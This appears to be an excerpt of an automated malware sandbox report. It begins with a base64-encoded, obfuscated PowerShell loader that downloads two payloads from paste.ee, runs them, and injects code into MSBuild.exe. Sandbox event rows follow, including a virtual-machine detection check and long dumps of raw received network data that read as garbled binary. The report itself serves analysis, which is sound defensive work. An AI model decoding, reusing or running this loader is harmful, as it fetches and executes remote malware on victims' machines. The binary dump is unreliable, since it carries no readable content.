UAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 22, 2021, 5:19 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 208 events)

Data received	[
Data received	W`1¯§]í½ÜvC"hØ¼e¯U6ÍDOWNGRD ~R°_!HkÍì¼¾ ¬»\|ìjtsç}Æ~ðÀ ÿ
Data received
Data received	½0¹0` ~±s0j±2}P;0 HÎ=0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc ECC CA-30 200806000000Z 210806120000Z0m10 UUS10 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0Y0HÎ=HÎ=B·Á"v,Æü"²5ÿÈNî+Ê\¥}ÈþtõódAjz1w0ÏbëFÓ(¡,öÁk0£0ÿ0U#0¥Î7êë°ug´EúÙ$0UjD89ó 07<´håë\06U/0- .paste.eepaste.eesni.cloudflaressl.com0Uÿ0U%0++0{Ut0r07 5 31http://crl3.digicert.com/CloudflareIncECCCA-3.crl07 5 31http://crl4.digicert.com/CloudflareIncECCCA-3.crl0LU E0C07 `Hýl00(+https://www.digicert.com/CPS0g0v+j0h0$+0http://ocsp.digicert.com0@+04http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0Uÿ00 +Öyôñïuö\/Ñw0"T0VãM3¿ß/ ÌNñdãsÄX;,F0D W#P¼¡ýZ¹öúcÖ)XÞ÷åP0ë½Ä9G dÚn®$ÿ$¿>Ï9ûiËõ`+nØÒ¯Üuv\ÜCþæ«ED±^ÔVæ7ûÕúGÜ¡s²^æöÇÊsÄX;\G0E p1ÍFû1Æµ;ìl\|U½tøî`P'Hð°ÎpÂcd!§N/ií_õ»$\6½ëB ò KÙÖüYþ¸ »Á0 HÎ=G0D ÓH>©s¤_\|×Jfc¿p'ñÅCÚdZÌ2mó Âuø#È»©ò:CÖoüÂDÔ3hd=Ñ0Í0µ 7d^_´"Nýí<0 H÷ 0Z10 UIE10U Baltimore10U CyberTrust1"0 UBaltimore CyberTrust Root0 200127124808Z 241231235959Z0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc ECC CA-30Y0HÎ=HÎ=B¹MfFìÑP/4}-¸8_¿»MïaFÄÉsÔ$OàîÎl³Qq/jîL wÓrb¤×£h0d0U¥Î7êë°ug´EúÙ$0U#0åY0GXÌ¬úT6{:µMð0Uÿ0U%0++0Uÿ0ÿ04+(0&0$+0http://ocsp.digicert.com0:U3010/ - +)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `Hýl00(+https://www.digicert.com/CPS0 `Hýl0g0g0g0 H÷ $Ý°*ëÖã9M^kWWüëè1¢We¾D8Zw¹ÏBÆá¤ãE'øG,h¨VST@ÁÐ¶× 8HlP,I[dÌH0.ÞâI"À^Õü ÜVlå¿zÀ7ãIú+át9·Úó¢WX`OÌüF{41>MG:Ëô]ïM n$Ý2%]xQ= 5#/eoÁÑC×Ðó1gY'ÝkÒu $$Ï)¾æ#Ã¸r?éÈ$DSz³¹ae¡LÆHÉucpERÓEêðè1~ þ>Ýª<^tÒ¬±
Data received
Data received	Ab3W»<;ÍçÂóAÅ=¤½¬¤Cg ü§G!äñú-´©Û{=ýh-Ú}"Õ ýÅ3Uüu%;l7G0E!´ðÆí2¹¿»Ùôï¥¼i$ÃU"Ô.º×_z± 1_"çêoA òEeÀÃ¢íZYt8jéH'
Data received
Data received
Data received
Data received
Data received	0
Data received	½¦ó7»Æà©zÎªêt^Oñëò!Ôxjt©NpÊØÿ*ìíúïÜ
Data received	p
Data received	cä±zÏè<ÝèÑó4ß¾%ðÒJtµu?C RÛã]üÌ¬ôú:º¤È¤0ò]N7Y®°úpï¨±ijÌÉ¾ôNìãv®~Kt~@j;F±½ùÎ±vJ{CM£CalÚìä ëêü)Tf6@ÛRSÈj¹V]7©o»NÔð7"ã¨°ýßJ©ÑG$ð'Ñ®n®úFÜ!³¬=Hqî¸f3÷Öoî ýÌÁ&ä¸ 1=¨¬Æ%ÑcÀ¹åW¤m¡UÒZ"$´f3u+²ißmèÞ]6M3Êº>~#Ò1%=òQ"Á±¦~Ô -f/ÆöS9aþ2×ë]`·þÍilÃ²üf¤Ô-®_¼.k\º´ØxÛâ$BÈ1,xQYyL0=ÁíÏXÓØDF%#T_0¦¬t·>ÐüÁÝ2$ Ã)ØNÑXhÙÈ¯=`WVQva'ÞxHG3KþIå=Ò?ÆA3 ÑM/ð#Aàû¦¤q¸¸´Ýr$ê÷#p¼_ºr®Ò£öÿ\|4åÝiÎ+ßù22Y\|çMYØ¬±k0 ·¿§Ç\(\êDÏ ){g8Np5uúß+,ö¨Ñ«¢ª00¦à Ì @moxÏGîÊv/Iqk7½Ól·5ï}5ÅñÅW4U:]âsAÂÐHçR¸áûL 5¦7"X¨;ÑøiÇÇ¾ÀYXh}K mÄ¨òzÒ.¾û¦´SØ¡»0ßIN4¢Ç¶l`ø<û¨û.Zfp½5ÞJBdé"3QôZ'vvó~Jf{+òê\|è&$)ÔC\Dbýò<¢ûÕ¯ ±¹aÈrB ç1üwâÐ5Æ¹ZÃ^ÜioMEAúóüPÀ©PV`%Ißá{Ï¶%3I:5YÜUvÏÒø¸I¹8è<Ò<Î®Eÿ&?ºæ4] áÊtæ¢+ÏõíÜ@¾7s¨R¥R=LÙcE¯qÞBóÉkD ?Ê¦eÿÊÞË÷XËø(Æøææ(Auì±¿)@³1î¬Gh¶äz>íqB^m-t)aMöô~ùéÂ²&Gï²õ!?g3ÝøhBT[rer¶>>»PRóç3µ%yâ-Â»e=<SiltKYÒªäá{KÞ¾kY¼j9ªþ~ÿøÓÑöÝ,xÙ@»Ou/Õ<1ÝÐåû¿4f;äI{@øÔvdñíT.òýaã^ìì^Ëc Tü10ÍÉcúLE¹o:_£p¶Ô ÷½_eUIùØL´¹b¶×]¿ÕÇË`<JÛYY\¡·~Lö?¦vb²N ;ýìû§h×Õ³¢<Î°l²Þ£XöÀÝWgÛÌ¬»³8^´ös¦¶ì¶cØ5s`Ý#íFÔf r?÷ÐhiñâÜxW³-1Ý-½(9- ªÀår:uòáûXËPôRÍ¢8ÇanÔ+?þk´þxuâQb,Ó¤38¡ÔPK¥n;Õ$Yâÿ ¦¹íÎlÕ?o~ÀSYÕg»<«L=G§5¹¤¡þ0ª#ZÀéwWB½d /Bª1øm×Õ ÇÌSUG5®6
Data received	Ð
Data received	¢L*ñ[,$sAþSÀ¸El¢ õOÅ¡vý`ÆHkªÙÓéúuðÒR°¢);Ì:!QÏ¸+am ºúß;×öÒ{ÁB7ºC@,ÑË'\ÓcÑ³KÓË{°d®ÿAhÌô£eMÎH«\7MtuC0dèÖõ¦(Ùod"xõQ¶é¦éùû úDÎ?4_YZ·vb,ÌeØJ £êô·ÑvòµÛ1}A®?Uîþd
Data received	°×N(ÐR8±WúºÓgbÛ+Þ¹m}RUÑRx~Úê½ãÀÀ0äQFµmÚè~¨Þø8Äæ6>°v7XÞx «vG,èÂ¥g³CÀsX3øÈAÒ?¢ßDÌ¼µbÑTe·üÆ°LE8~éª´îv"þÎZiO/É¤R0É´åûbVêtåKoJÿKãrÈ1ê¬õÏvûû_2.?Ä]4ì}FÆò»L¯ÝÖä5Íé°ªâ-1<À Iaa8ÆoB8wtAâ:p~?Ã#YÝMõ.°?^oØ³j)h©RÐ µ Äj=- G?Z4õµJÎâ p?ºÛç=ÛàÌÉ÷¼7¢kQQG!Æ\|!ÿ;&¼FäF´ßtqåûUW?³°gVÓvcÐ Ù/ÏÞÜ¶Ñ y°Ìe#r<çfpÊRSæ8Ñ'íÑT¥+l Ë®ª¬Ùóc¦Q´ZÑýåÖËzÝ0A´9NKÜðVq ±³K×Úoån«°ô3:\Áõúµz/¼À±kÛgõ =ªCB'¯^ì8ýï]çî:ÃÛ5ð[8oQ6Lý±Ã´D?[²HW®X\| ÐÛÓ,Ç"âýÃ±Í-m¾Köî£WD÷L&íì0?sÁévJëØX"h¯±ñ'õ+Ò øÛÆÀU3zè²®ã/ù.küo&LÐIF/ égyÅõ\·\|_HLêS0¯ÇÑÀfùÝTyhDEI@ã«¤ïñZ>Xg ÃÀ.¸)(ßeð?èïGõWt([cÎ¾á B`1 ää y# §ÅæëR?úÓØßtFÄ{eu`lc¡==[1]0÷Ò)({Óø)>7(+ºÀ1tÔãKY:2ëùÖ~?¾Î»j}H¸è ûÿÍüMÉ!´¿¸Kn^DI¤áeçÚZgO¥ðÜd µ0g» xÜü>YÈ£¼û>Á\|ðIôÓ+¼Æ{bÍ>ÐÒ.ÛDKéRg»!XT+©zM¼ ±JzÏ]ÐLïæÜ8J\|1.ô'È«ïò¸`,Ì´·q" D:ºàVArPcbtvÒÀ_9hÀùü#ÄÝçVê¯,Ð°!·0gÎLÀpE0 µÔáu´±pXFÌVëÌìt¯Á} ¸â¼Ì)ù>¯é[ú¡s¹n8ì×+à4¾a®þ&4Q"vh$^'o£C'®Qda¹Ð~^ùÔu:¨Øª¸mÛ¼¸½ô©ÿ²iú%Ã6pÃ{9³l\z·ÊóP9üE¯« ¹,[AÁ½ºH 3]LQ°UÝ.9²c¥é\|Po§)åT¯÷R0gJ¿!}zÍT}áézcÁmëX>Ì;wé.J>¿Ó£H»q°$!â¨Q²Ã÷8 7@«V¨P#`kC*çÜ{Ü`½Ñe¤Ózs ¦ôj8^l2 ùÆ¬uya\LED:Ó\ª¶¹Ö¤ølåF=aÛÉùâÏ8kÇO1õ#Z]'0fÿ÷q5ðf,ÈÏç÷zDÆa7
Data received	¸< )²¿Úû¨¥Dj³SÇ¸7ÓÀdsu{]>.ü}J(ÿ²ª7¬Æd¹fÎYÚäP¸HevlÙi¿}7w3ÁîûÏ-£¹Â¾³ÕGfÜÍÛ:?Ê`k]UÓPõÒ<À¿-AÌtÝà£IÄvq ~¶Au@Ü:»³3Ã&êÆæÉ³§ïáÌO´ië´- k«¥ìíx¸É²í§Zµ8eÒ8ÞVÃ'ÕÇ[ÖZO·âiïy(ªQMaIþcx«A¿2¼Wåf0î"CæëÖ¸lËÊh®8Îä"x®¿âËÌÞÜ©ªöÞÎïËÈ`]õÜ¼»«yÒ¼ÓàÎ¾÷Ü3³Ï»$ÌG{/Zí6h¬t7#Áaz½põS®ß¥¶¾ 5Z}BÂ1xÍFU{åÖ XîÜõ"¶ñóÆ.=9&,PC³\|bw1q'=ÖPjnUÔ\Wu4ZË±x=4õ)9swÙeÊ==³ë§³ :óiïë.-³l«8'ëd<ÏBp4Å=nâMþïÁ\|ÄHêªÊ]Q´¤¬§éV÷ÑTOT'TtfÜÇ¢92t± æÛÅje1Qã1´W¨@öÌD×DÌBtAO§W¤áÛþ¤ø¿]:MaB(¡µIãÅ/ZÖ?¬êfý2?0ÑnBZ9N_v>¯1øµ¬ÁÒÖ_6'hÆSº7¦uð=~Øb¿W´l#ebWòDi1Àøÿ\-@ÀJ3ñó³LÅ\¥ÁJ½Ñ÷~iÀ¨'R>ÿexÈÀ5sLEÎC÷sf#Ìpüw\|µËv¾È(Ié}éyM¿É<x¯PG®F4wÆì×?_ä/ãg"XtûmjùÞ]9#Ùç}gàáxÕËL9ÿvØàR²Lr]\ÈêMµy»©$Ä×\|cÅ<×§Üº®ÉôqÍtôæV=:º/¦0¡ÆýÍ(/\|¡³ ¡?U9fÆ¯¬jøÝÞ OKk³k6t$xQä$·»²°ªäë=®ÝÕ$D©´º¹qlL7â"¾üD$\|qh2ñÞ5×hô È÷Âç°PhïÎ¿¨Æ YüþxúD^é¾ÃÕ¡ªQ½Éì©µTG°ßÏºF rvÑ,¸æ3ØËÏmj fÃùØEÒ¸¦m´Åe ÎwcßÏ%Ðz0×¢'ÍB³ýÐ;u]D ¥ä²>¶SI¨²L;;M]F;Ê\kìljûåØ¤~Ì4Ó)â=í¼7\|%ð7ñiÃBÀ_{î(/ùuÔ³H9ìäå ´Ö§+tÚÙ×ÅÚ¬tü×NÆáæLßúDyFnVC¨ßEÝÞ/Gëéq»)Òî¡ènkM ürÙ0%sãzÕ`ý±ôãÎ²a&KG pØ¢ýlæÄpi±%&[n<T¾ÈÔa¤ãÅ±L°N @ ÿ`Mo§¬ý°/¿w[5tS®P/'RûR§#ðkïsÃK§"6ÒbÿÏþÜwî¥àn° ¬"¢á@¥ÚÓöé¬ïHtãUmtr>)±xÅvùp.ë(s·MÕb¥!Õ^ÕÏªJ±EÞIc£
Data received	hø¾MæÊ;´ºkÎ´ßþÁ «1Xþ±~Ú»¤I¶Ô¶YïZÀ}\èy4+V>cæ`v-s<Ln^ª¯Hº.³¿¥>#ÅÊgEÑæúE¹¸q©Ó¥ÁÓqµK3,[> J ßº?ÂÕQ\6\|åUôôeð@I3·Ü,2þ¢{7)Mì¤Rãý±Å½Þ,ÕK¥XÊu[³pNæÔ½v^/VË/Edj I¯í¹É¸½S¶ÀÀTægÛg43 §jÁ)7@¢M~:ygou¯½Kç%»yRß¸¡Sú& ¬qÏÚ nÐ5gR\[ÐÄvi©`â@ÔB¨ÆÎÃ-y´³t\¶}DÝ^Që ³Ql-¸$x°¶û³³»VPÿ.f¼TfÙFK>Z»vôÌCz²xrKUÃLMÛâ`õ¤ÂHý£L[ò£¢§~APk~fNóò {n¬× n\|úÎç¡Ù+É%·s® D.Ï°5\|-G(ím+ÜBùAÿàzú$Ìä¦9ôo ¯À;yTopÅ¹»«(â7±(¬Kõ46VôfÎ"~þ²CÐ%Ä«ïÇ¾oG¾o{èÛ×õhÏi=køÈã®¤@TPsHÃýØJ3b®VÉl:öa(éãÒxUÍjØµx)¡vÍì1dujé'Agu¢]N¥Cð±´pË%.-ÎQ·¯ÓÄð#ûè¼¡ó®ni×Énfr©`ùh«PçY' 8fvg½"bÑ¦2P14ÄCC¢D\ø_Tcdù"¹öWU^òäA6MÖ;Ø/ª¼;ÝUky£&^bO¦¨"¹CeYa$ÞPï\t bp æà¦lò}Ôüç´¸È(¹UHeÂrroïCht®\ÔoVç/ôË+¤Æ_u,~çüe«DHÄÒùYU³ ÏöÏ7?9¿¦øÕ>UNù e¸ÿ!ºÌJÜµ:¿&#+ T.åÇïOSe?bµTÑ~£ÑäÌ`ëGNw<¶<Å$ª²`:¢ðºIØÞö«µY9 %qè´6dm}4T²².ñ¡ÜæÙ´Õ@²§ñý6õ"0Áã<+4¡ªÑk{]ü8]ùÌí]¹Ø#ua¾jÁ Ë>½i8©ß2YL(9çÖ'åêDúOÝÝÂÙ¿}ª,q¸¨¯E²Ø©ÕT¸hR:Ø$ÐNÊT»Èôéà~^ã¬g8SÑ ~±û.ÿï ¤-Ø©_µÚ:Kµbý³1µø·DøÕ Ë%\|xÑh.&ý y=Oóøì=¥j'O¶û¹ø¸ìEß/°h°X~ÝzÄ:¥ÈüÖh¹yç«¨hiÚTÒ ½&¡øÕïCMÜ8ÚK}ú\2'ùª¤\|0>YÀ,+4öm'ÿ¥^Þ¹v;µfz§²_ôW¢»V ··î&Ì¢È&¨lvU¢àä«þlÙª´@Àt7ÀûÍ¶?L6,ÿèó²:ê&wÅ¸½RO4¯Ô¢¼ÆEOïèG~nÅ/Åàºû9\|äLìç)p²2í(s&ÙÚ¯~Éé¯m`¤ 4vøÜÅQ¨3äÙÂçÖÐµäO*Ôÿ&òáÑì³·ö0x/õC®U
Data received	Ö×etãlú½VåkäÀõµÞ5¹Oi«çß:À"Ö+À@<²@î%Cìg'ælÛ¬émT¡EªãÚDIzu\|óü[ÕÉVÇ¹÷tyûèÇ´÷¨±Ý:ÎÈòT:»;Å0,£D«Z©ÄFìSX_éz`QqBCàLgþÁR:27 £±8¾ù×"ÐÃÈ»{øì<b·=Ç`í«ÙFí`Ä{9Í~B´ØeOp¨²añaÝê{üÜ5Nõ¹°ÓÆ¦+\g>ÖËýl=³½, ¢D$ÂÕ#ÄçéCöG!$àþDÇ×ÊÎg;Ñ@×´tÍþ.qn:8Cp§yçZþk¡¢7,ª/ÂÐRàIa=ôºtÂ2Ávõßâë±ªNæF6gw}åÅ @õÕ±¦µrT9'_ï~ç"c¥úV,+WÒÏýÅ¿RH®'WõSQM>Ûìo?U Ö@°¦K¢\ yíÀr·ÀÓÛÒÔ9ò¿'Á©p¢õap'$r,ò·pÑÔd Ò¾³IRË¥Âgo´_¹Lå\Né¯Ý¥ý'+'x.Aâ§pñ1Å 'E}qûm3>ØÍø$vU\|¨¯ äw·oZ¦ya¬¨¿¸ÆQí×qáØzä°3Ç×øà[¸28ökpåhU¿jÜÿC K_ùýü]æw{-âZÝÐ^'ú©]ìQôêR£:Ëø³µÌr×RDÇ1kUÊÓ#)pµæp( ûyÐ>Zöç´Ìª¯Úm$¤Ý¤]-4ïto\o¡Aa{C(Ä©rW·0³xD+çw¥ulâ º³0P.»öAràÈq³Ä¾¼`UXÊ}êå$ºË¶×Ôûyióù0ëlÉ ÒÍÛëPzÐ9a¡mÈ9¹ÍM [JË¸ ½±KDr]¹Ò¸¨ä,Jç¸£ïå~½ ß«ËXFÈé÷wêg ^!ñQQê_éVôÙÛÐ:îæ- ñèO8¼}áÏõ µ]jnöÉ ÷FÅ ÊW[ Æ¼§¨xh~7d0ÃÏ¸óÕÂ;âlYÃ6÷ØÐÐ»cjFN§X¤¶ËÒÍ¨å:yné«ÄÚ!rXëÅ±%QÔgW#Sà cµ#¯¬Æ/¬½ÕjZ·w®ÙçkAGR¢]k_ðröÏ +3¯²ñÞd<_Ïö¢IHÝÏó3e½¶]öÂZGû¿þ#ÄoÊ«¡Þ&Ìå.Wú?Ø¼@^dS¢wÙâþ¯Æià^<dÒuøÏ\|q { ¥ØU¢ð¬n×`7B«÷"+Xÿó(VÛê<¸Võ±z}ÿÄ»ABdæ²+é =ôþÎ`Bi`lèÀ¡âAs´ÞÃA%¡z r£Ò÷k¹Aéôýªºy(kÙÛlºóÅ¹gn7jcÓÆÄ¯f´öG5ÊZ¨¨>FzÎÆF!´r?dÜ&idMêVÌço2'¬ef¹by;96k§Un#½Û¿{*ótdâÑB1ÎØÅ¢Z6te¢°¿æÓ®Æ-hU)rªÿÚfa5¥ë\B÷ÞÈÍÅ3)¥´ô"uRvr×
Data received	@sÂW :0 3U×?/ºåï÷Î»½yhøÌíg4u"<ÃñT ÎBÓ:gµªy³ÇT¹bJ³JùøÄ3µ][TóÒ@àôß`àëVÝM`´ÂÓ£=ð¹-âBiænÀpKS?ÖWoÚMr5Á¾öXÍaj½¬e3f¼@ýØÕzkÊÐ¥#Ò×cU 5ñJzýOéáç¥ö5æ dÖçáïÆ?ù%óLñß:pä¾Ì â.í0û8Ð$³LbaÎöÜNDuá9Wìq®PÉ Ö¼þ±øax¯z«NË"7É8§úÏú[ÎîkFM¹þ6¢$THjg §u³\jsÉéÝ®õY/±n?Y¦ß¡û4+Ñ¢êK3ÛìÅáUce,â°²MÁq®y«Ý`oÇ@N`m`÷ÕÈAë"ÄõZm2uühëÑ§ZÐÄ\|GDÎÈÅ(Óïø"p,ªÒ üBÿµÇ=^ ËÏª=r?)qê)tCF+>ªÉ/ÒèË©^ØüY÷XÛC ÃJ8Gèü~ÔûmAÐíð29ñ ÉÆF2[?(_1!±8CnaòËx]éÉP1ÑéMÜ>ûS´&Ä=¶uåÞ¼(!K5Q\|ïÛ!6yN.Oá)Þb7Gäeêþ)ÛÁu^$ô¿09Ü~U?7ÝËA ¸Úi1ùLyÏÌ!0m}#¾^NÉàDOXë/¼-¦å!Ó>0ð=\¸ µAñoýöeèKÈÂÇ c£{¾DñõEÜÕW]}¥¹Í±dN¬G?{Ôðou54\|Å?Ü®êþï)#Õ©å+í[öøÆ·Â&dSªæú ©·°lñ~QÄ)ÁWµØ4äÿ 5î±eeÙvxîkpèú «)Ge\([ªÞ÷¼; ^Ç(£Ñù2ÊÍ~i\V/]ÐlI1© årÇîF"nu4¡pà§w[P\¢*¨ª1¸ºô<]XÍióÒØð¦¬L<B'ý~û«ÉuzèX`äUaìð~OøÙzÇÑãMF: .ò8kÜ;E¯änþC=ê@PL4`J¬ì¥½ôD¨H>OüÃeMPÌàÆ¹¸Ä:ÓO<ÞMkÞx§\o¿fÍoM(ëFé'¡RÃSU<(ä)³d¢¼6vWÝñJWafª, Â3Ú´eË óø?ZU¹Srý2ÜZ²°R;W$,î(¬!(£ûfbyNõB¼0¸:ª¨F&õüQ\Me®ü/D 0xämô7?_éuhÛH´?E²æ/Ý:Þä%Ä")·ùè$_%Æ÷ëVØAôâKÖüØñ%¯SLùhR¹ë¨ðRäÓReRÆL´²^íiÌç5D µ{Äji²¶ÉO(ª(×ÙÙ43¡W@Äº´Û2³Wï¹JÑ4D¥ëÇ£xÌN÷Ë¥âR<>èèa¬Þûu21ÿnÀVò4¹íãxdµ!ÿAA³±gÁ:3 m=:¹µTU+²~Ä"ïQ0ýwM5ñÓg9q¾vÐøùÈF÷ËQ¬2_¶¿×Øe÷cròñÇMtwíWõ/,"8øÇûÈÅZCÏ2@"ºXä¹O©ñÎª²Gª¢±øªKqvë³?Ì4ëKY
Data received	z/G·«?wE·qðçwQóéHp oæ&§ ü^BÙùã½[ýýÄíÿÆ¦q\|Ò@FPãg¢ä¢a¥ °ó«ØY$MZAâ\.ZêhsñD`Áo\CKiQÌµwË ifÊQÚN«D6@Æ7E\oÐûAHðUTd $"HÑæ©©¬õFÅg[~áßÇ<dLy¡h/.ä\|¨Yß+&Vï+hF®A9+Dò¹¦BÃ¤ìÑ¯ûÖ÷Oó%<T>{+J¨°çú²ÑËº[ÅÊKÔjê /&Ö}5=YbêEÃÌ ¼§ì0ÇÊ=aªÜ¨´cÞÊNQA>+TºÞ¸¯h ¬ÊË2&³ÂAtÄÓ 1¨Âj£¶î5ñA Õt½Sïóo3¿t&ìvì´ÿsOaåÎÔVÚCõ¦ôÊn±ZÛIqî!eìÎ.ÍCPóq½©½)Ø§Sü[q5³ÎG¡}ut±× Ë>ã»ôg!)_ÇùÊâòôL]Öê·äG¹¥ Å¤bÃàRR¤HfîïOXÛY5O_>eå,sETÊA®FÂIlp_?"¡8@.àé-°Ðäx[ P8;\|®d@#Ån;5B(¾6!#ùG ÒaRô-à¸ÚÝ¦6³þQ² ®ø~ç¹ËI¥®ûÉ]É§ßV>/¶sìÎ'pµú3,½Il+]ÇÃT¼;(+w}îX±®(èjWGö&s)BSÉ.W=?dþüµhÈÚ»2¬\êÇ¾QNh/øÕ¢²Ufµ&mèT=ú[ùS¯Y%óÊ)0±Òx\%qPÜ£ù`u-òô$x~é£¦ á§ÄbÇ±y7\ÐÿÉÌ\|9ê:õiDla&Î;6±!M9)èÆòEúF CøQRv%^¶øS©KÏ$ç÷½ZÞHÏ¶YÛ÷ÔAOï"!´êNø®5öÅB®h1»8öF9ÊFZé>ÊàiL¢)¦p0öñ£°×`6'_óÆ"á¯5©±õ'K0Õ ÃWÙÎ2sÕÈYÓZf¹pß«ÉrÍ\|~¡¤Y{°bJá·Óí nALÊ²UGÜuvî eå®n=:¼" ùè)¼ùBC½.Çãí\|NFC>á¶À ¢ØnflÜ×kâçvåA =v\@^íÂkÑâÔ£×yHÔÙéüÅqÈô¾è7ç{0¸péïwßy6ª®E©ö#ÃòJhñóüAvÊõØú`ÒÓ¸±"ôßZq3Ò¦ÅöG¾»ÞciþÔË,7Ù ¦Bih6²<¶à!0 ¬UÓôååìùWÄÀ¼õ#È=£Å9[Ú¬ý©qÂÝyH"@ÒÝ;åÞçùÕëgvc½ãýFzÜVZµ]gèK9góNJ¹®©¸¶}ÿxÿsd}Ë²b7Ho-.oPß°øÂjFHáôF°×P¢Ñ)ïT½aº÷Ï[YJ`k¢¢MïWþS4$uÿfdÔ ûÀøûbÁúÔ¥C¨LYëü·OàäÆ?]ÿáÿ 9%§y½>[Å#8aU'âR1öÕÄ¸Ò½·Á¦¾Qf¾OqÏ A©Ên/QnÛ£f<xÉö
Data received	ûO«åÖ°1-WA£äN«vâ÷ eð>2Âª ¼ÛÊÔ¶YÎ£ÎiÁ)3õÔyJË Ô¬² &øá2Q~X³@ùïéû+îÙHÚÑ@`/7ÃfuÖÊAbäÊë< ¨¢+tÈ¦JÙ¥îè~YñZ:÷ø¯¦?Å%8øBçì-)úaWú Å¾éCkÆxkGW6!hÈßÊpQ¥9O£ÈüÄÙ35¨xÀ&·¯©Z¬Ø¢±)÷Ø%9ÅoôñîJ×ÑÚNoÁªcFeægsv FJÉÞMaÉµ}úsøÕ±'0Ð?âj°¥0á0p±#Ímë$x~UyK¢ÅH¶`©Ö° ËÅmµh@w©¥ÏõÀ¼B(JåõYL(¡bl§öEW³{BTüX;A-»FåYµ¯m$Êxsîâg³½ä·&Y¶½8wðËh1<~~¹en@·íäëYH@Ä5éÑ_1Nrçqdaë@fâF×,ÉÞÙ¡Z<OÆ=Ñ[ÈVTús¯Í"j²Äo¸>NÍÝÆß'«@[Äþq¯àHçCÇ[× ¢ ²ØÁlÓ^qü×.êèTOøq¹;Ë']¼õÍ\«Îx÷§39faúZâh<â.¢ëkT=N$$DÒ^ÅñM°]\|¡Pû2ÕÅÍÃewçºUq h¿Z{jyÞ"á(Ã'Ø³Vî%±Øf{ Ôø®ò¡áü~è¸ûÞÌ¶åÆôÙ=?ëËÙCíþ·WÁcÚÌ´²'»ÎÞ{p2+\|çÒÆ¿ÛòzFÍøçMfr@{ÇÃ8DtBF1äYýDD´6z? Ã¯dXD¸.IHÚè]% Ð¾(÷Zâ)3H6¬9DX¼ê 5bá)ÿ@²pnáÚ} ´´iycö"hzhwvåTVó%\|üóÛæ([Ê}§ü8Xâôõ´àJâ©M¯§ ~A£¸êBÁÃPOì´:ÒQ»ÿãf²Ûöä.5ÅvõjÁv`.ç6]AZ;Ï«Ud¥ZÑ^EÑþÎgÛ¡fNg`V.Im´:OwE;ö\|ÇÃÎëaº ½½¦×w´s×ÍÀ¸\"~ÿu³IõÕwÁK0 Ã½~Í¶-é¬ß±ÞWlÌÐ^&¤$ÕMË¦>ÙæïËòÐ«'-£qÆW¥° àÁ·/k2ÞÆW'ëéìÌR-Çdý²ý»ÐfÍNÎAæ4gÌuó;,]Zõ~´òq¸ÑRQè:'}Æø¦ÛlàYy7ÌÃ´+ìÚd±ZT9WZ9xëûuðÖ¦°Ú¦ÔMEO/d¡$j0¢Ú â¹R¡×Lw½Ã¯í;a¼Öòhó4,Â¢qYµh ¿4z¯ÒÙái ¾áåó9é×>1Bâ,óµ¾¾è¥Êo} bu¬Ñö3#¨ÂráH§g÷ÇU¸NÛ¸?½â)JÛ_¼¿ÿ Òç©syWz¨ ª@ë8>e¥Ø<d-ÒLþO,ÌÂu6Mx± 4ÛßpcHS¨5ÖÆy£ÌhB ÌÊù Ty0c½Yÿ)8l"òÂQ³ù!Z»òpÏã~ó
Data received	ölxÊd-X"l<dÀZ¹6B0*KHÆ¾aÉå)·cEáOÐaç±¼E@ÛÚ+ß4Î÷
